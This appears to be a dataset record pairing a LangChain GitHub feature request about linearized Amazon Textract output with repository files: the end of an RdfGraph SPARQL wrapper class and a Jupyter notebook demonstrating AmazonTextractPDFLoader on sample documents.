"""SELECT DISTINCT ?dp ?com\n"""
"""WHERE { \n"""
""" ?dp a/rdfs:subPropertyOf* owl:DatatypeProperty . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
)
class RdfGraph:
"""RDFlib wrapper for graph operations.
Modes:
* local: Local file - can be queried and changed
* online: Online file - can only be queried, changes can be stored locally
* store: Triple store - can be queried and changed if update_endpoint available
Together with a source file, the serialization should be specified.
*Security note*: Make sure that the database connection uses credentials
that are narrowly-scoped to only include necessary permissions.
Failure to do so may result in data corruption or loss, since the calling
code may attempt commands that would result in deletion, mutation
of data if appropriately prompted or reading sensitive data if such
data is present in the database.
The best way to guard against such negative outcomes is to (as appropriate)
limit the permissions granted to the credentials used with this tool.
See https://python.langchain.com/docs/security for more information.
"""
def __init__(
self,
source_file: Optional[str] = None,
serialization: Optional[str] = "ttl",
query_endpoint: Optional[str] = None,
update_endpoint: Optional[str] = None,
standard: Optional[str] = "rdf",
local_copy: Optional[str] = None,
) -> None:
"""
Set up the RDFlib graph
:param source_file: either a path for a local file or a URL
:param serialization: serialization of the input
:param query_endpoint: SPARQL endpoint for queries, read access
:param update_endpoint: SPARQL endpoint for UPDATE queries, write access
:param standard: RDF, RDFS, or OWL
:param local_copy: new local copy for storing changes
"""
self.source_file = source_file
self.serialization = serialization
self.query_endpoint = query_endpoint
self.update_endpoint = update_endpoint
self.standard = standard
self.local_copy = local_copy
try:
import rdflib
from rdflib.graph import DATASET_DEFAULT_GRAPH_ID as default
from rdflib.plugins.stores import sparqlstore
except ImportError:
raise ValueError(
"Could not import rdflib python package. "
"Please install it with `pip install rdflib`."
)
if self.standard not in (supported_standards := ("rdf", "rdfs", "owl")):
raise ValueError(
f"Invalid standard. Supported standards are: {supported_standards}."
)
if (
not source_file
and not query_endpoint
or source_file
and (query_endpoint or update_endpoint)
):
raise ValueError(
"Could not unambiguously initialize the graph wrapper. "
"Specify either a file (local or online) via the source_file "
"or a triple store via the endpoints."
)
if source_file:
if source_file.startswith("http"):
self.mode = "online"
else:
self.mode = "local"
if self.local_copy is None:
self.local_copy = self.source_file
self.graph = rdflib.Graph()
self.graph.parse(source_file, format=self.serialization)
if query_endpoint:
self.mode = "store"
if not update_endpoint:
self._store = sparqlstore.SPARQLStore()
self._store.open(query_endpoint)
else:
self._store = sparqlstore.SPARQLUpdateStore()
self._store.open((query_endpoint, update_endpoint))
self.graph = rdflib.Graph(self._store, identifier=default)
# Verify that the graph was loaded
if not len(self.graph):
raise AssertionError("The graph is empty.")
# Set schema
self.schema = ""
self.load_schema()
@property
def get_schema(self) -> str:
"""
Returns the schema of the graph database.
"""
return self.schema
def query(
self,
query: str,
) -> List[rdflib.query.ResultRow]:
"""
Query the graph.
"""
from rdflib.exceptions import ParserError
from rdflib.query import ResultRow
try:
res = self.graph.query(query)
except ParserError as e:
raise ValueError("Generated SPARQL statement is invalid\n" f"{e}")
return [r for r in res if isinstance(r, ResultRow)]
def update(
self,
query: str,
) -> None:
"""
Update the graph.
"""
from rdflib.exceptions import ParserError
try:
self.graph.update(query)
except ParserError as e:
raise ValueError("Generated SPARQL statement is invalid\n" f"{e}")
if self.local_copy:
self.graph.serialize(
destination=self.local_copy, format=self.local_copy.split(".")[-1]
)
else:
raise ValueError("No target file specified for saving the updated file.")
@staticmethod
def _get_local_name(iri: str) -> str:
if "#" in iri:
local_name = iri.split("#")[-1]
elif "/" in iri:
local_name = iri.split("/")[-1]
else:
raise ValueError(f"Unexpected IRI '{iri}', contains neither '#' nor '/'.")
return local_name
def _res_to_str(self, res: rdflib.query.ResultRow, var: str) -> str:
return (
"<"
+ str(res[var])
+ "> ("
+ self._get_local_name(res[var])
+ ", "
+ str(res["com"])
+ ")"
)
def load_schema(self) -> None:
"""
Load the graph schema information.
"""
def _rdf_s_schema(
classes: List[rdflib.query.ResultRow],
relationships: List[rdflib.query.ResultRow],
) -> str:
return (
f"In the following, each IRI is followed by the local name and "
f"optionally its description in parentheses. \n"
f"The RDF graph supports the following node types:\n"
f'{", ".join([self._res_to_str(r, "cls") for r in classes])}\n'
f"The RDF graph supports the following relationships:\n"
f'{", ".join([self._res_to_str(r, "rel") for r in relationships])}\n'
)
if self.standard == "rdf":
clss = self.query(cls_query_rdf)
rels = self.query(rel_query_rdf)
self.schema = _rdf_s_schema(clss, rels)
elif self.standard == "rdfs":
clss = self.query(cls_query_rdfs)
rels = self.query(rel_query_rdfs)
self.schema = _rdf_s_schema(clss, rels)
elif self.standard == "owl":
clss = self.query(cls_query_owl)
ops = self.query(op_query_owl)
dps = self.query(dp_query_owl)
self.schema = (
f"In the following, each IRI is followed by the local name and "
f"optionally its description in parentheses. \n"
f"The OWL graph supports the following node types:\n"
f'{", ".join([self._res_to_str(r, "cls") for r in clss])}\n'
f"The OWL graph supports the following object properties, "
f"i.e., relationships between objects:\n"
f'{", ".join([self._res_to_str(r, "op") for r in ops])}\n'
f"The OWL graph supports the following data properties, "
f"i.e., relationships between objects and literals:\n"
f'{", ".join([self._res_to_str(r, "dp") for r in dps])}\n'
)
else:
raise ValueError(f"Mode '{self.standard}' is currently not supported.")
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 12,068 | feat: Add Linearized output to Textract PDFLoader | ### Feature request
Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints.
Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call
### Motivation
Improve downstream LLM accuracy
### Your contribution
I'll submit a PR for this feature. | https://github.com/langchain-ai/langchain/issues/12068 | https://github.com/langchain-ai/langchain/pull/12446 | a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445 | 0c7f1d8b219e87e3ffd14a15a452622c532c7e95 | "2023-10-20T08:28:07Z" | python | "2023-10-31T01:02:10Z" | docs/docs/integrations/document_loaders/pdf-amazonTextractPDFLoader.ipynb | {
"cells": [
{
"cell_type": "markdown",
"id": "1f3cebbe-079a-4bfe-b1a1-07bdac882ce2",
"metadata": {},
"source": [
"# Amazon Textract \n",
"\n",
"Amazon Textract is a machine learning (ML) service that automatically extracts text, handwriting, and data from scanned documents. It goes beyond simple optical character recognition (OCR) to identify, understand, and extract data from forms and tables. Today, many companies manually extract data from scanned documents such as PDFs, images, tables, and forms, or through simple OCR software that requires manual configuration (which often must be updated when the form changes). To overcome these manual and expensive processes, Textract uses ML to read and process any type of document, accurately extracting text, handwriting, tables, and other data with no manual effort. You can quickly automate document processing and act on the information extracted, whether you’re automating loans processing or extracting information from invoices and receipts. Textract can extract the data in minutes instead of hours or days.\n",
"\n",
"This sample demonstrates the use of Amazon Textract in combination with LangChain as a DocumentLoader.\n",
"\n",
"Textract supports PDF, TIFF, PNG and JPEG format.\n",
"\n",
"Check https://docs.aws.amazon.com/textract/latest/dg/limits-document.html for supported document sizes, languages and characters."
]
},
{
"cell_type": "code",
"execution_count": 1,
"id": "c049beaf-f904-4ce6-91ca-805da62084c2",
"metadata": {
"tags": []
},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"\n",
"\u001b[1m[\u001b[0m\u001b[34;49mnotice\u001b[0m\u001b[1;39;49m]\u001b[0m\u001b[39;49m A new release of pip is available: \u001b[0m\u001b[31;49m23.2\u001b[0m\u001b[39;49m -> \u001b[0m\u001b[32;49m23.2.1\u001b[0m\n",
"\u001b[1m[\u001b[0m\u001b[34;49mnotice\u001b[0m\u001b[1;39;49m]\u001b[0m\u001b[39;49m To update, run: \u001b[0m\u001b[32;49mpython -m pip install --upgrade pip\u001b[0m\n"
]
}
],
"source": [
"!pip install langchain boto3 openai tiktoken python-dotenv -q"
]
},
{
"cell_type": "markdown",
"id": "400b25c6-befa-4730-a201-39ff112c8858",
"metadata": {},
"source": [
"## Sample 1\n",
"\n",
"The first example uses a local file, which internally will be send to Amazon Textract sync API [DetectDocumentText](https://docs.aws.amazon.com/textract/latest/dg/API_DetectDocumentText.html). \n",
"\n",
"Local files or URL endpoints like HTTP:// are limited to one page documents for Textract.\n",
"Multi-page documents have to reside on S3. This sample file is a jpeg."
]
},
{
"cell_type": "code",
"execution_count": 9,
"id": "1becee92-e82f-42d4-9b4e-b23d77cbe88d",
"metadata": {
"tags": []
},
"outputs": [],
"source": [
"from langchain.document_loaders import AmazonTextractPDFLoader\n",
"\n",
"loader = AmazonTextractPDFLoader(\"example_data/alejandro_rosalez_sample-small.jpeg\")\n",
"documents = loader.load()"
]
},
{
"cell_type": "markdown",
"id": "d566dc56-c9a9-44ec-84fb-a81928f90d40",
"metadata": {},
"source": [
"Output from the file"
]
},
{
"cell_type": "code",
"execution_count": 10,
"id": "1272ce8c-d298-4059-ac0a-780bf5f82302",
"metadata": {
"tags": []
},
"outputs": [
{
"data": {
"text/plain": [
"[Document(page_content='Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No ', metadata={'source': 'example_data/alejandro_rosalez_sample-small.jpeg', 'page': 1})]"
]
},
"execution_count": 10,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"documents"
]
},
{
"cell_type": "markdown",
"id": "4cf7f19c-3635-453a-9c76-4baf98b8d7f4",
"metadata": {},
"source": [
"## Sample 2\n",
"The next sample loads a file from an HTTPS endpoint. \n",
"It has to be single page, as Amazon Textract requires all multi-page documents to be stored on S3."
]
},
{
"cell_type": "code",
"execution_count": 7,
"id": "10374bfb-b325-451f-8bd0-c686710ab68c",
"metadata": {
"tags": []
},
"outputs": [],
"source": [
"from langchain.document_loaders import AmazonTextractPDFLoader\n",
"\n",
"loader = AmazonTextractPDFLoader(\n",
" \"https://amazon-textract-public-content.s3.us-east-2.amazonaws.com/langchain/alejandro_rosalez_sample_1.jpg\"\n",
")\n",
"documents = loader.load()"
]
},
{
"cell_type": "code",
"execution_count": 11,
"id": "16a2b6a3-7514-4c2c-a427-6847169af473",
"metadata": {
"tags": []
},
"outputs": [
{
"data": {
"text/plain": [
"[Document(page_content='Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No Patient Information First Name: ALEJANDRO Last Name: ROSALEZ Date of Birth: 10/10/1982 Sex: M Marital Status: MARRIED Email Address: Address: 123 ANY STREET City: ANYTOWN State: CA Zip Code: 12345 Phone: 646-555-0111 Emergency Contact 1: First Name: CARLOS Last Name: SALAZAR Phone: 212-555-0150 Relationship to Patient: BROTHER Emergency Contact 2: First Name: JANE Last Name: DOE Phone: 650-555-0123 Relationship FRIEND to Patient: Did you feel fever or feverish lately? Yes No Are you having shortness of breath? Yes No Do you have a cough? Yes No Did you experience loss of taste or smell? Yes No Where you in contact with any confirmed COVID-19 positive patients? Yes No Did you travel in the past 14 days to any regions affected by COVID-19? Yes No ', metadata={'source': 'example_data/alejandro_rosalez_sample-small.jpeg', 'page': 1})]"
]
},
"execution_count": 11,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"documents"
]
},
{
"cell_type": "markdown",
"id": "3a9cd8ec-e663-4dc7-9db1-d2f575253141",
"metadata": {},
"source": [
"## Sample 3\n",
"\n",
"Processing a multi-page document requires the document to be on S3. The sample document resides in a bucket in us-east-2 and Textract needs to be called in that same region to be successful, so we set the region_name on the client and pass that in to the loader to ensure Textract is called from us-east-2. You could also to have your notebook running in us-east-2, setting the AWS_DEFAULT_REGION set to us-east-2 or when running in a different environment, pass in a boto3 Textract client with that region name like in the cell below."
]
},
{
"cell_type": "code",
"execution_count": 12,
"id": "8185e3e6-9599-4a47-8969-d6dcef3e6404",
"metadata": {
"tags": []
},
"outputs": [],
"source": [
"import boto3\n",
"\n",
"textract_client = boto3.client(\"textract\", region_name=\"us-east-2\")\n",
"\n",
"file_path = \"s3://amazon-textract-public-content/langchain/layout-parser-paper.pdf\"\n",
"loader = AmazonTextractPDFLoader(file_path, client=textract_client)\n",
"documents = loader.load()"
]
},
{
"cell_type": "markdown",
"id": "b8901eec-070d-4fd6-9d65-52211d332441",
"metadata": {},
"source": [
"Now getting the number of pages to validate the response (printing out the full response would be quite long...). We expect 16 pages."
]
},
{
"cell_type": "code",
"execution_count": 13,
"id": "b23c01c8-cf69-4fe2-8141-4621edb7d79c",
"metadata": {
"tags": []
},
"outputs": [
{
"data": {
"text/plain": [
"16"
]
},
"execution_count": 13,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"len(documents)"
]
},
{
"cell_type": "markdown",
"id": "b3e41b4d-b159-4274-89be-80d8159134ef",
"metadata": {},
"source": [
"## Using the AmazonTextractPDFLoader in an LangChain chain (e. g. OpenAI)\n",
"\n",
"The AmazonTextractPDFLoader can be used in a chain the same way the other loaders are used.\n",
"Textract itself does have a [Query feature](https://docs.aws.amazon.com/textract/latest/dg/API_Query.html), which offers similar functionality to the QA chain in this sample, which is worth checking out as well."
]
},
{
"cell_type": "code",
"execution_count": 14,
"id": "53c47b24-cc06-4256-9e5b-a82fc80bc55d",
"metadata": {},
"outputs": [],
"source": [
"# You can store your OPENAI_API_KEY in a .env file as well\n",
"# import os\n",
"# from dotenv import load_dotenv\n",
"\n",
"# load_dotenv()"
]
},
{
"cell_type": "code",
"execution_count": 15,
"id": "a9ae004c-246c-4c7f-8458-191cd7424a9b",
"metadata": {
"tags": []
},
"outputs": [],
"source": [
"# Or set the OpenAI key in the environment directly\n",
"import os\n",
"\n",
"os.environ[\"OPENAI_API_KEY\"] = \"your-OpenAI-API-key\""
]
},
{
"cell_type": "code",
"execution_count": 16,
"id": "d52b089c-10ca-45fb-8669-8a1c5fee10d5",
"metadata": {
"tags": []
},
"outputs": [
{
"data": {
"text/plain": [
"' The authors are Zejiang Shen, Ruochen Zhang, Melissa Dell, Benjamin Charles Germain Lee, Jacob Carlson, Weining Li, Gardner, M., Grus, J., Neumann, M., Tafjord, O., Dasigi, P., Liu, N., Peters, M., Schmitz, M., Zettlemoyer, L., Lukasz Garncarek, Powalski, R., Stanislawek, T., Topolski, B., Halama, P., Gralinski, F., Graves, A., Fernández, S., Gomez, F., Schmidhuber, J., Harley, A.W., Ufkes, A., Derpanis, K.G., He, K., Gkioxari, G., Dollár, P., Girshick, R., He, K., Zhang, X., Ren, S., Sun, J., Kay, A., Lamiroy, B., Lopresti, D., Mears, J., Jakeway, E., Ferriter, M., Adams, C., Yarasavage, N., Thomas, D., Zwaard, K., Li, M., Cui, L., Huang,'"
]
},
"execution_count": 16,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"from langchain.llms import OpenAI\n",
"from langchain.chains.question_answering import load_qa_chain\n",
"\n",
"chain = load_qa_chain(llm=OpenAI(), chain_type=\"map_reduce\")\n",
"query = [\"Who are the autors?\"]\n",
"\n",
"chain.run(input_documents=documents, question=query)"
]
},
{
"cell_type": "code",
"execution_count": null,
"id": "1a09d18b-ab7b-468e-ae66-f92abf666b9b",
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"availableInstances": [
{
"_defaultOrder": 0,
"_isFastLaunch": true,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 4,
"name": "ml.t3.medium",
"vcpuNum": 2
},
{
"_defaultOrder": 1,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 8,
"name": "ml.t3.large",
"vcpuNum": 2
},
{
"_defaultOrder": 2,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 16,
"name": "ml.t3.xlarge",
"vcpuNum": 4
},
{
"_defaultOrder": 3,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 32,
"name": "ml.t3.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 4,
"_isFastLaunch": true,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 8,
"name": "ml.m5.large",
"vcpuNum": 2
},
{
"_defaultOrder": 5,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 16,
"name": "ml.m5.xlarge",
"vcpuNum": 4
},
{
"_defaultOrder": 6,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 32,
"name": "ml.m5.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 7,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 64,
"name": "ml.m5.4xlarge",
"vcpuNum": 16
},
{
"_defaultOrder": 8,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 128,
"name": "ml.m5.8xlarge",
"vcpuNum": 32
},
{
"_defaultOrder": 9,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 192,
"name": "ml.m5.12xlarge",
"vcpuNum": 48
},
{
"_defaultOrder": 10,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 256,
"name": "ml.m5.16xlarge",
"vcpuNum": 64
},
{
"_defaultOrder": 11,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 384,
"name": "ml.m5.24xlarge",
"vcpuNum": 96
},
{
"_defaultOrder": 12,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 8,
"name": "ml.m5d.large",
"vcpuNum": 2
},
{
"_defaultOrder": 13,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 16,
"name": "ml.m5d.xlarge",
"vcpuNum": 4
},
{
"_defaultOrder": 14,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 32,
"name": "ml.m5d.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 15,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 64,
"name": "ml.m5d.4xlarge",
"vcpuNum": 16
},
{
"_defaultOrder": 16,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 128,
"name": "ml.m5d.8xlarge",
"vcpuNum": 32
},
{
"_defaultOrder": 17,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 192,
"name": "ml.m5d.12xlarge",
"vcpuNum": 48
},
{
"_defaultOrder": 18,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 256,
"name": "ml.m5d.16xlarge",
"vcpuNum": 64
},
{
"_defaultOrder": 19,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 384,
"name": "ml.m5d.24xlarge",
"vcpuNum": 96
},
{
"_defaultOrder": 20,
"_isFastLaunch": false,
"category": "General purpose",
"gpuNum": 0,
"hideHardwareSpecs": true,
"memoryGiB": 0,
"name": "ml.geospatial.interactive",
"supportedImageNames": [
"sagemaker-geospatial-v1-0"
],
"vcpuNum": 0
},
{
"_defaultOrder": 21,
"_isFastLaunch": true,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 4,
"name": "ml.c5.large",
"vcpuNum": 2
},
{
"_defaultOrder": 22,
"_isFastLaunch": false,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 8,
"name": "ml.c5.xlarge",
"vcpuNum": 4
},
{
"_defaultOrder": 23,
"_isFastLaunch": false,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 16,
"name": "ml.c5.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 24,
"_isFastLaunch": false,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 32,
"name": "ml.c5.4xlarge",
"vcpuNum": 16
},
{
"_defaultOrder": 25,
"_isFastLaunch": false,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 72,
"name": "ml.c5.9xlarge",
"vcpuNum": 36
},
{
"_defaultOrder": 26,
"_isFastLaunch": false,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 96,
"name": "ml.c5.12xlarge",
"vcpuNum": 48
},
{
"_defaultOrder": 27,
"_isFastLaunch": false,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 144,
"name": "ml.c5.18xlarge",
"vcpuNum": 72
},
{
"_defaultOrder": 28,
"_isFastLaunch": false,
"category": "Compute optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 192,
"name": "ml.c5.24xlarge",
"vcpuNum": 96
},
{
"_defaultOrder": 29,
"_isFastLaunch": true,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 16,
"name": "ml.g4dn.xlarge",
"vcpuNum": 4
},
{
"_defaultOrder": 30,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 32,
"name": "ml.g4dn.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 31,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 64,
"name": "ml.g4dn.4xlarge",
"vcpuNum": 16
},
{
"_defaultOrder": 32,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 128,
"name": "ml.g4dn.8xlarge",
"vcpuNum": 32
},
{
"_defaultOrder": 33,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 4,
"hideHardwareSpecs": false,
"memoryGiB": 192,
"name": "ml.g4dn.12xlarge",
"vcpuNum": 48
},
{
"_defaultOrder": 34,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 256,
"name": "ml.g4dn.16xlarge",
"vcpuNum": 64
},
{
"_defaultOrder": 35,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 61,
"name": "ml.p3.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 36,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 4,
"hideHardwareSpecs": false,
"memoryGiB": 244,
"name": "ml.p3.8xlarge",
"vcpuNum": 32
},
{
"_defaultOrder": 37,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 8,
"hideHardwareSpecs": false,
"memoryGiB": 488,
"name": "ml.p3.16xlarge",
"vcpuNum": 64
},
{
"_defaultOrder": 38,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 8,
"hideHardwareSpecs": false,
"memoryGiB": 768,
"name": "ml.p3dn.24xlarge",
"vcpuNum": 96
},
{
"_defaultOrder": 39,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 16,
"name": "ml.r5.large",
"vcpuNum": 2
},
{
"_defaultOrder": 40,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 32,
"name": "ml.r5.xlarge",
"vcpuNum": 4
},
{
"_defaultOrder": 41,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 64,
"name": "ml.r5.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 42,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 128,
"name": "ml.r5.4xlarge",
"vcpuNum": 16
},
{
"_defaultOrder": 43,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 256,
"name": "ml.r5.8xlarge",
"vcpuNum": 32
},
{
"_defaultOrder": 44,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 384,
"name": "ml.r5.12xlarge",
"vcpuNum": 48
},
{
"_defaultOrder": 45,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 512,
"name": "ml.r5.16xlarge",
"vcpuNum": 64
},
{
"_defaultOrder": 46,
"_isFastLaunch": false,
"category": "Memory Optimized",
"gpuNum": 0,
"hideHardwareSpecs": false,
"memoryGiB": 768,
"name": "ml.r5.24xlarge",
"vcpuNum": 96
},
{
"_defaultOrder": 47,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 16,
"name": "ml.g5.xlarge",
"vcpuNum": 4
},
{
"_defaultOrder": 48,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 32,
"name": "ml.g5.2xlarge",
"vcpuNum": 8
},
{
"_defaultOrder": 49,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 64,
"name": "ml.g5.4xlarge",
"vcpuNum": 16
},
{
"_defaultOrder": 50,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 128,
"name": "ml.g5.8xlarge",
"vcpuNum": 32
},
{
"_defaultOrder": 51,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 1,
"hideHardwareSpecs": false,
"memoryGiB": 256,
"name": "ml.g5.16xlarge",
"vcpuNum": 64
},
{
"_defaultOrder": 52,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 4,
"hideHardwareSpecs": false,
"memoryGiB": 192,
"name": "ml.g5.12xlarge",
"vcpuNum": 48
},
{
"_defaultOrder": 53,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 4,
"hideHardwareSpecs": false,
"memoryGiB": 384,
"name": "ml.g5.24xlarge",
"vcpuNum": 96
},
{
"_defaultOrder": 54,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 8,
"hideHardwareSpecs": false,
"memoryGiB": 768,
"name": "ml.g5.48xlarge",
"vcpuNum": 192
},
{
"_defaultOrder": 55,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 8,
"hideHardwareSpecs": false,
"memoryGiB": 1152,
"name": "ml.p4d.24xlarge",
"vcpuNum": 96
},
{
"_defaultOrder": 56,
"_isFastLaunch": false,
"category": "Accelerated computing",
"gpuNum": 8,
"hideHardwareSpecs": false,
"memoryGiB": 1152,
"name": "ml.p4de.24xlarge",
"vcpuNum": 96
}
],
"instance_type": "ml.t3.medium",
"kernelspec": {
"display_name": "Python 3 (ipykernel)",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.11.1"
}
},
"nbformat": 4,
"nbformat_minor": 5
}
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 12,068 | feat: Add Linearized output to Textract PDFLoader | ### Feature request
